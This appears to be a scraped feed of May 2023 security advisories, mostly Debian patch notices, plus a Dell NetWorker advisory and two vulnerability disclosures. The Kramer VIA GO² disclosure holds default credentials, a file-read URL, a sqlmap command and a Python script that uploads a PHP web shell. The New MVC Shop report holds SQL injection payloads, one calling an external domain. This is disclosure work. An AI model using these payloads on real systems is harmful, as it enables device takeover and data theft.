Debian Linux Security Advisory 5417-1 - Multiple vulnerabilities have been discovered in OpenSSL, a Secure Sockets Layer toolkit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5417-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
May 31, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openssl  
CVE ID         : CVE-2023-0464 CVE-2023-0465 CVE-2023-0466 CVE-2023-2650  
Debian Bug     : 1034720

Multiple vulnerabilities have been discovered in OpenSSL, a Secure  
Sockets Layer toolkit.

CVE-2023-0464

    David Benjamin reported a flaw related to the verification of X.509  
    certificate chains that include policy constraints, which may result  
    in denial of service.

CVE-2023-0465

    David Benjamin reported that invalid certificate policies in leaf  
    certificates are silently ignored. A malicious CA could take  
    advantage of this flaw to deliberately assert invalid certificate  
    policies in order to circumvent policy checking on the certificate  
    altogether.

CVE-2023-0466

    David Benjamin discovered that the implementation of the  
    X509_VERIFY_PARAM_add0_policy() function does not enable the check  
    which allows certificates with invalid or incorrect policies to pass  
    the certificate verification (contrary to its documentation).

CVE-2023-2650

    It was discovered that processing malformed ASN.1 object identifiers  
    or data may result in denial of service.

For the stable distribution (bullseye), these problems have been fixed in  
version 1.1.1n-0+deb11u5.

We recommend that you upgrade your openssl packages.

For the detailed security status of openssl please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/openssl

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmR3XbdfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Q57RAAnVKJS02ib/Uke98Kia//N7JAweY3jZ5IGluzGqms6di2Z9+1qW/qbjI+  
tGq2HdEd/ujN1+8hLciZN9U12Otkrt+Z//TvIJDBNd12sAiK6w5efVlIhESOW8z+  
nXxDBNsZv4ocqFcdWlXTaE1JQBd4MGULHsrItoczMwL1iiHfuvOxS7XqrttfGK2K  
WlnE3/uzmKJup77u4OnHxicTEaUGesV8fvv2uoI+gxkiQPZbEDLBINClDlhSgAae  
vMhrZrYLwS6vNZOG4fvDheHkd+3jO1YCv+742YeZbEfa6o3RXYGvLzSRNo5MhR/K  
N2/pxTHsRFaPlAxjys1UNGsZsIK7eZR0jyVRrF3PkbMgI4SVEyoqsI19i+viGoHY  
Ih6YkrSFxmQfK+1XDXS4RFOgVN900h4D/V/13udiswHShaFVsf4wu9SagmJtzR7X  
TzsphwZAbvxcqhaKdURgHoXaokMRxlO7vFijB1//Q+/uJJrkpLb+XTkN+SnujCSA  
48tAs3vnv9fki14+B6IQ9Tyg/Obhxk+z5Xb3W6H6xO1IfdmCibBvF77O8Q8uKIhD  
p3yhZeZY0VanKJMxquC3Yi0Ja6wbcJuww33/9/pqpTEdaoOnxb/wXNU0x2wIRBUL  
7IzNcmgVpQ1P3UhM58WZGOUS/0+IAtGfuEzZJiuWWKyV3hFvIEs=XKMH  
-----END PGP SIGNATURE-----

Debian Security Advisory 5417-1

Debian Linux Security Advisory 5416-1 - It was discovered that there was a potential buffer overflow and denial of service vulnerability in the gdhcp client implementation of connman, a command-line network manager designed for use on embedded devices.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5416-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuMay 31, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : connmanCVE ID         : CVE-2023-28488Debian Bug     : 1034393It was discovered that there was a potential buffer overflow and denialof service vulnerabilty in the gdhcp client implementation of connman, acommand-line network manager designed for use on embedded devices.For the stable distribution (bullseye), this problem has been fixed inversion 1.36-2.2+deb11u2.We recommend that you upgrade your connman packages.For the detailed security status of connman please refer toits security tracker page at:https://security-tracker.debian.org/tracker/connmanFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmR2MiEACgkQO1LKKgqv2VQR/QgApr1QeIQIfrW7WfJYD0C0xVXhLuO2X1D2yxgUjHIEChpaWu7ogcOh3dBNQkZAWmsWqFs/TnCdrltt8txJHfBz/PYkzPjwBN/CHZjW2t7HxCZqmA3tnuHGtzotJRQD5G2d1W5ycJUL88ZWar0GKn98nwdsxTCRy8mi157Gy588pTrQbS+P9HtTK0I0eUysoupKoEb2HGgn6nlpQJoRWqJnqkv7FmB6jOecP4ivAnmjwiciwMztIvggsJ+yjYns6BXLzNQyU5T0ch2a2Mduddm4iR9Ax7KV8fv8+UIEEzwp+2tCKctV/yAmQodgK3LJsgIkoFMJBMjevuozcp8o6QNbZw=åQs-----END PGP SIGNATURE-----

Debian Security Advisory 5416-1

KramerAV VIA GO² < 4.0.1.1326 is vulnerable to Unauthenticated arbitrary file read.

**Introduction**

Kramer VIA GO² devices were vulnerable to multiple issues, including:

*   Unauthenticated arbitrary file read (CVE-2023-33507)
*   Unauthenticated SQLi (Squeely) (CVE-2023-33509)
*   Unauthenticated file upload resulting in RCE (CVE-2023-33508)

By chaining with previously discovered privilege escalation through misconfigured Sudo rules (CVE-2021-35064), it was possible to completely take over a device from an unauthenticated standpoint.

Throughout the disclosure process, Kramer have been exceedingly helpful and responsive. They were quick to confirm the issues and release a patch that fully resolves the issues.

**What is a Kramer VIA GO²?**

> VIA GO² gives iOS, Android, Chromebook, PC, and Mac users instant wireless connectivity with 4K advanced presentation capabilities. Kramer’s new VIA 4.0 is all about the end user. The new VIA application UI is intuitive, user-friendly and much easier to use. VIA 4.0 enables any user, including guests, to easily and securely connect and automatically disconnect at the end of the session.

After finding a device with default credentials (su:supass), it was discovered that it was possible to upload a font with an arbitrary extension and no content restrictions. This meant it was possible to upload a font which is actually a PHP script with the extension .php. Once the path on disk was found, visiting directly in a browser would execute the PHP file and allow a user to perform commands on the underlying operating system. From there, we created a dump of the available web application/PHP source code. The code was protected using IONCube, however this was bypassed using commonly available tools such as easytoyou.eu.

Available handlers were reviewed for issues and the three high severity vulnerabilities were discovered. It is likely that there are more within the codebase, and our audit of the code was in no way exhaustive.

After reviewing the latest firmware for these devices (4.0.1.1326), we noted that the handlers were _not_ included with the Debian package. The file runpkg.sh, which is run as part of the update process, contained the following commands:

    ...
    rm -rf /var/www/html/downloadRecording.php
    rm -rf /var/www/html/downloadMedia.php
    rm -rf /var/www/html/UploadWallpaper.php
    ...
    

This indicates that these endpoints should be removed by a firmware update.

While the firmware itself is password protected, simply by decoding the source code the decryption password was discovered.

**Proofs of concepts****Unauthenticated file read (CVE-2023-33507)**

The following endpoint allowed for the contents of arbitrary files on the file system to be retrieved:

*   http://XXX/downloadRecording.php?file=/etc/passwd

**Unauthenticated SQLi (CVE-2023-33509)**

This could be exploited with the following sqlmap command:

    sqlmap -u 'https://XXX/downloadMedia.php?medId=*' --dbms mysql --risk 3 --level 5 --technique B --threads 10
    

As an added bonus, the contents of arbitrary files could be obtained with the following payload:

*   https://XXX/downloadMedia.php?medId=-1+UNION+SELECT+"/../../../../etc/passwd"

**Unauthenticated RCE via File Upload (CVE-2023-33508)**

This issue can quickly be identified by attempting to access the endpoint:

*   http://XXX/UploadWallpaper.php

If this handler returns the message “Please enter the image to upload” it is very likely to be vulnerable.

The following Python payload can be used to obtain RCE:

    import requests
    import sys
    from urllib3.exceptions import InsecureRequestWarning
    
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    
    SHELL = '<html><head><title>babyshell</title></head><body><pre><?php echo $_REQUEST["cmd"]; ?></pre><br/><pre><?php echo system($_REQUEST["cmd"]); ?></pre></body></html>'
    
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target.com|1.2.3.4>")
        exit(1)
    
    target = sys.argv[1]
    
    url = f'https://{target}/UploadWallpaper.php'
    
    print("Uploading shell")
    
    resp = requests.post(url, files={'data': ('zx.php', SHELL)}, verify=False)
    
    if "Image added sucessfull" not in resp.text:
        print("Shell failed to upload")
        exit(1)
    
    print("Shell uploaded. Checking shell")
    
    url = f"https://{target}/uploads/large/zx.php"
    resp = requests.get(url, verify=False)
    if "Minishell" not in resp.text:
        print("Shell failed")
        exit(1)
    
    print("Shell available at:", url)
    

**Potential Impact**

Complete device compromise is possible, either via the RCE or obtaining user passwords via the Squeely.

**How to Fix It**

First update to version 4.0, then apply version 4.0.1.1326 or later.

**Vulnerability Disclosure Timeline:**

*   21/02/2023 Disclosed issue to CERT NZ
*   09/03/2023 Response from Vendor
*   17/03/2023 Vendor released patched firmware to ZX. ZX identified that the patch removes the vulnerable endpoints.
*   31/05/2023 CVEs assigned

CVE-2023-33507: Kramer VIA GO² - ZX Security


Dell NetWorker 19.6.1.2, contains an OS command injection Vulnerability in the NetWorker client. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. This is a high severity vulnerability as the exploitation allows an attacker to take complete control of a system, so Dell recommends customers to upgrade at the earliest opportunity.



**Vaikutus**

High

**Tiedot**

**Proprietary Code CVE(s)** 

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2023-25539

Dell NetWorker 19.6.1.2, contains an OS command injection Vulnerability in the NetWorker client. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. This is a high severity vulnerability as the exploitation allows an attacker to take complete control of a system, so Dell recommends customers to upgrade at the earliest opportunity.

8.4  
 

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H  
 

**Proprietary Code CVE(s)** 

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2023-25539

Dell NetWorker 19.6.1.2, contains an OS command injection Vulnerability in the NetWorker client. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. This is a high severity vulnerability as the exploitation allows an attacker to take complete control of a system, so Dell recommends customers to upgrade at the earliest opportunity.

8.4  
 

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H  
 

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**CVE(s) Addressed**  
 

**Product**

**Affected Version(s)**

**Updated Version(s)**

**Link to Update**

CVE-2023-25539

Dell NetWorker  
NVE  
 

NetWorker 19.6.1.2 Linux and prior releases  
NetWorker  
19.7.0.3 Linux and prior releases,  
19.7.1 Linux

19.8.0.1 & Later releases

19.7.0.4 & Later releases

https://www.dell.com/support/home/en-ca/product-support/product/networker/drivers  
 

 

**CVE(s) Addressed**  
 

**Product**

**Affected Version(s)**

**Updated Version(s)**

**Link to Update**

CVE-2023-25539

Dell NetWorker  
NVE  
 

NetWorker 19.6.1.2 Linux and prior releases  
NetWorker  
19.7.0.3 Linux and prior releases,  
19.7.1 Linux

19.8.0.1 & Later releases

19.7.0.4 & Later releases

https://www.dell.com/support/home/en-ca/product-support/product/networker/drivers  
 

 

**Kiitokset**

Dell Technologies would like to thank Maciej Kosz for reporting this issue.

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2023-04-03

Initial Release

2.0

2023-05-11

Made changes to Updated Versions

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Lisätietoja**

The impacted component is NetWorker client and the affected platforms are Linux (CentOS, OEL, SuSE, RHEL, Debian, Ubuntu, Fedora).

NetWorker Family, NetWorker, NetWorker Series, NetWorker Module, Product Security Information

11 toukok. 2023

CVE-2023-25539: DSA-2023-060: Dell NetWorker Security Update for an nsrcapinfo Vulnerability.

Jean-Baptiste Cayrou discovered that the shiftfs file system in the Ubuntu Linux kernel contained a race condition when handling inode locking in some situations. A local attacker could use this to cause a denial of service (kernel deadlock).

CVE-2023-2612: CVE-2023-2612 | Ubuntu

Debian Linux Security Advisory 5415-1 - Two security issues were discovered in LibreOffice, which could potentially result in the execution of arbitrary code when loading a malformed spreadsheet document or unacknowledged loading of linked documents within a floating frame.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5415-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 28, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libreofficeCVE ID         : CVE-2023-0950 CVE-2023-2255Two security issues were discocvered in LibreOffice, which couldpotentially result in the execution of arbitrary code when loading amalformed spreadsheet document or unacknowlegded loading of linkeddocuments within a floating frame.For the stable distribution (bullseye), these problems have been fixed inversion 1:7.0.4-4+deb11u7.We recommend that you upgrade your libreoffice packages.For the detailed security status of libreoffice please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libreofficeFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRzchEACgkQEMKTtsN8TjbRrRAAh/7Ahy9I1prBZqnkRKL3JubDmB7+ni9lK1Jmw0wRGVEBFiFOL6wmJXNiHeqXwx/mNv0/PBZGBNsicKAtftv9ixWfWumBKZSWEfPF9wVDwYGBF6xgC8adCcHk4PZ+/DhuNmGoeTJt6FokhkD/AiATR4IhJJLVUwexZV4jMTRyK85JJ4fTkjZnWgk+OkhHMEBMnAIqjWvpS5HapkTuqBvkzNS9+CgZgi03hcSCCdOP4ioGCQt6pHMrpZ0PyOyJukKOR3FO7YMV1U93dcH7wBrMMRilhH6CAXlAVhQz+48A9sXpZN44zYDdEWv6PNrMNhscLXH2bP1JFB2QGh43dMwt+C5VLlWU1BEWHndVE4Juiq5gkBbfCiENXbjSjxt61f1ZxqlMWBGirgePk9p1y0oZj3E0PKgxo8ViCU5ReaRw2LglGzLR+6bgeav52Zk5nJfKQThGKRWbhncXkF0exVtaaJIVw7NGjzPPZqGsIin/XySxBVIljzP1bPi/cW3oW2t81e5uL6ffWM37sM1K0H2E5CQRNvAr0S2L+5AeJa3f1qmzN00pwnmGdLnV/xA0hftn4NWRtdoFbnPTclpyOVH5M3P4D58NY9Hbc+VAQhViWAdt05HnKtKlxU/zq3Sn+qo9IVAtjaD+DiRuhZfXKNaLbP8apQoISsjZnemH0X+HQVM57e-----END PGP SIGNATURE-----

Debian Security Advisory 5415-1

Debian Linux Security Advisory 5412-1 - Several vulnerabilities were discovered in libraw, a library for reading RAW files obtained from digital photo cameras, which may result in denial of service or the execution of arbitrary code if specially crafted files are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5412-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoMay 27, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : librawCVE ID         : CVE-2021-32142 CVE-2023-1729Debian Bug     : 1031790 1036281Several vulnerabilities were discovered in libraw, a library for readingRAW files obtained from digital photo cameras, which may result indenial of service or the execution of arbitrary code if speciallycrafted files are processed.For the stable distribution (bullseye), these problems have been fixed inversion 0.20.2-1+deb11u1.We recommend that you upgrade your libraw packages.For the detailed security status of libraw please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/librawFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmRyXNFfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0S6ehAAlIVUex5cV2eOg9y4Z4MrXPPEl7DPhsEItBnU6tA0PQLxImblhRY2+bruFw7S3ovXQxOJQRW3CQ7ykRenfERuZXvENJwbauwD4XFAFPOHcs0lEkdAumQ4pEnxczetY/GXvXVqZ5L2LD8SDLrPLO37u5JNZGclVHn+2OkzSPm3rMwvXXPy0uik6PG1dlJBTbAeTm8bCls+TEvcCD3M1EgwqcJ4Cemnd43R4BvLsd8FJWWB41XrbvEtt5s644k3eJ19EkjYJ/lfi2Uu2b6m1crdFt1DSFl1UlGaMWL/Jz+R8OzAYenlY7RRXzZOsMSPlt4B4TUC1AG0WgeZhec4StNDhdQyNZ4ild/2yUqR0cdMLWIHs1Lst+Yr4sKO4BAe75otA93nV49bicwgA+8Sb4nehLZAIm+dUbc+6SmqwntHsfZpSyWTt4FuAH6dM8R6hOAXkQ7DI9x9eod1NLH0FXqcl61qAKrfs348Rd4vPZY5TCndxvSJDuyynDFs9GrYKgN0mN/2ePAgj2Y7CvfUnkoVwK9AeQRETkSLzTwivT+XBc2RUaYRohGARp7DXnoEhtvLUx1Efr1LKXNizT958kpBPvTp3fVf6iP/fW9VtZudbvQb2wBrF7iDe/r4PX2OoYXdbm5qiV7wU20M+YQwZqIva95FQkKxdtPfnYzAWpWMa8g¿zv-----END PGP SIGNATURE-----

Debian Security Advisory 5412-1

Debian Linux Security Advisory 5414-1 - Jose Gomez discovered that the Catalog API endpoint in the Docker registry implementation did not sufficiently enforce limits, which could result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5414-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 27, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : docker-registryCVE ID         : CVE-2023-2253Debian Bug     : 1035956Jose Gomez discovered that the Catalog API endpoint in the Dockerregistry implementation did not sufficiently enforce limits, whichcould result in denial of service.For the stable distribution (bullseye), this problem has been fixed inversion 2.7.1+ds2-7+deb11u1.We recommend that you upgrade your docker-registry packages.For the detailed security status of docker-registry please refer toits security tracker page at:https://security-tracker.debian.org/tracker/docker-registryFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRx4msACgkQEMKTtsN8TjZ7fw/9E+dbZBJfuAwWXfAdwAuSE+6aN2Ddqb956wFeT0K+sMaEzhnDthATuJx0cR8K9TfVOcSUbn7bhi/fDxlWMoUL+wN14MxwphZ2udEAgkv052bz97/vAU2bcGNuye081BQWgbdpxm4Y5ioVSyze0y9uixKkBA6grnc9DQoEZz/4cqifxJh5itwFi/AC5TuNzZk4HY7kDrRf/OLZZpZFNloNP9G535FxEdmjR3jTd6scSbEnwmXmuUPUQwo6IfrCLnPRVXY0Vn2Pphb8fK1vsYZrWQpzvBHr4UO/z8F14Pl1AVqQNh0Oct5y/oDhY4MN8n9e5Zsx4lunBczhOS8fGy0gU2ZLK12KTLeTdA1TSZMV6MrkFdYAiWDI6+qP7f8LQi4m1h2HqJX9nm50eEjZ4lfwtK0Xwb0YQEkadpnknbdQM1zkojblFZOjQqq8GQwQQYD+XfIRThZWLz3vA9RhE1MH0/p5JNxfQmm2VG7xdtBdWV5PRtnUtC9KoYQ4wyJjE4AxRbbVbVGoyuoQOCEmMt+MYp68aYjHQD6szT9aGNpyxKdncjHVAVQGdb4cYPAi3m0uObQKsy0q6tDXu+8BhZDoFaFlyy9AtFjPL0mE36FTiLxOmkkJ0Xi4fNlu4Ghq2yiX/lK+xuXjQ+D7SVu6KEuKg8p7ATxIh5k2AmSh6bO7Gz8=vOWz-----END PGP SIGNATURE-----

Debian Security Advisory 5414-1

New MVC Shop version 1.0 suffers from remote SQL injection and missing attribute vulnerabilities.

    ## Title: new-mvc-shop-1.0 - SQLi + SameSite attribute weak securityPHPSESSID Hijacking## Author: nu11secur1ty## Date: 05.29.2023## Vendor: https://chikoiquan.tanhongit.com/## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0## Reference: https://portswigger.net/web-security/sql-injection## Description:The `User-Agent` HTTP header appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\ttq1xmuilflmnv0pcl7cjdwb42avymmdp1koacz.pedal.com\\iqp'))+'was submitted in the User-Agent HTTP header. This payload injects aSQL sub-query that calls MySQL's load_file function with a UNC filepath that references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can retrieve all information from thedatabase of this system.---------------------------------------------------------------------------------------------------------------The following cookie was issued by the application and does not havethe secure flag set:PHPSESSID: The cookie appears to contain a session token, which mayincrease the risk associated with this issue.The malicious user can use one PHPSESSID to connect multiple times onthe system using the same account session.STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: User-Agent (User-Agent)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8)Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-2)' AND (SELECT2825 FROM (SELECT(SLEEP(15)))VKYP)-- kuoe---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/new-mvc-shop-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/new-mvc-shop-10-sqli-samesite-attribute.html)## Time spend:00:35:00

New MVC Shop 1.0 SQL Injection / Missing Attributes

Debian Linux Security Advisory 5411-1 - Multiple issues were found in GPAC multimedia framework, which could result in denial of service or potentially the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5411-1                   security@debian.org  
https://www.debian.org/security/                                  Aron Xu  
May 26, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : gpac  
CVE ID         : CVE-2020-35980 CVE-2021-4043 CVE-2021-21852 CVE-2021-33361   
                 CVE-2021-33363 CVE-2021-33364 CVE-2021-33365 CVE-2021-33366   
                 CVE-2021-36412 CVE-2021-36414 CVE-2021-36417 CVE-2021-40559   
                 CVE-2021-40562 CVE-2021-40563 CVE-2021-40564 CVE-2021-40565   
                 CVE-2021-40566 CVE-2021-40567 CVE-2021-40568 CVE-2021-40569   
                 CVE-2021-40570 CVE-2021-40571 CVE-2021-40572 CVE-2021-40574   
                 CVE-2021-40575 CVE-2021-40576 CVE-2021-40592 CVE-2021-40606   
                 CVE-2021-40608 CVE-2021-40609 CVE-2021-40944 CVE-2021-41456   
                 CVE-2021-41457 CVE-2021-41459 CVE-2021-45262 CVE-2021-45263   
                 CVE-2021-45267 CVE-2021-45291 CVE-2021-45292 CVE-2021-45297   
                 CVE-2021-45760 CVE-2021-45762 CVE-2021-45763 CVE-2021-45764   
                 CVE-2021-45767 CVE-2021-45831 CVE-2021-46038 CVE-2021-46039   
                 CVE-2021-46040 CVE-2021-46041 CVE-2021-46042 CVE-2021-46043   
                 CVE-2021-46044 CVE-2021-46045 CVE-2021-46046 CVE-2021-46047   
                 CVE-2021-46049 CVE-2021-46051 CVE-2022-1035 CVE-2022-1222   
                 CVE-2022-1441 CVE-2022-1795 CVE-2022-2454 CVE-2022-3222   
                 CVE-2022-3957 CVE-2022-4202 CVE-2022-24574 CVE-2022-24577   
                 CVE-2022-24578 CVE-2022-26967 CVE-2022-27145 CVE-2022-27147   
                 CVE-2022-29537 CVE-2022-36190 CVE-2022-36191 CVE-2022-38530   
                 CVE-2022-43255 CVE-2022-45202 CVE-2022-45283 CVE-2022-45343   
                 CVE-2022-47086 CVE-2022-47091 CVE-2022-47094 CVE-2022-47095   
                 CVE-2022-47657 CVE-2022-47659 CVE-2022-47660 CVE-2022-47661   
                 CVE-2022-47662 CVE-2022-47663 CVE-2023-0770 CVE-2023-0818   
                 CVE-2023-0819 CVE-2023-0866 CVE-2023-1448 CVE-2023-1449   
                 CVE-2023-1452 CVE-2023-1654 CVE-2023-2837 CVE-2023-2838   
                 CVE-2023-2839 CVE-2023-2840 CVE-2023-23143 CVE-2023-23144   
                 CVE-2023-23145

Multiple issues were found in GPAC multimedia framework, whcih could result  
in denial of service or potentially the execution of arbitrary code.

For the stable distribution (bullseye), these problems have been fixed in  
version 1.0.1+dfsg1-4+deb11u2.

We recommend that you upgrade your gpac packages.

For the detailed security status of gpac please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/gpac

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmRwutMACgkQO1LKKgqv  
2VQhxgf/aXBHEqvI+O12zLVGiSFBgAgP0WpynhRv+ESync2+EFNBpF/1/w0CAhVr  
mn3NWsUxj21u4Pm9YjfvG7+YXaDTaEqkrgwVknvZKwV6KY42mSEvztWfqTk5xEe1  
Hi7MUL+xKIjUblcgFxNSEAZkb/u9XO3KE7XbPKqNE+FZtz+K95Vtq7CGx+jvpa/F  
Q+e286fsay38RYsI+ESqxe8N5WYljiIph/thot/uawV6vSNYqR1te4wzn//AkDvL  
ADq4Hsr3yQSpDbPEToJwS+Q/Gd4YH7IsqtdSMWdtnrxC6Ri4zSrq+AlOvPe7xM35  
aIUZuLxhqlp6rmBBhNYefgqTiX1vdg==  
=faP5  
-----END PGP SIGNATURE-----

Tag

#debian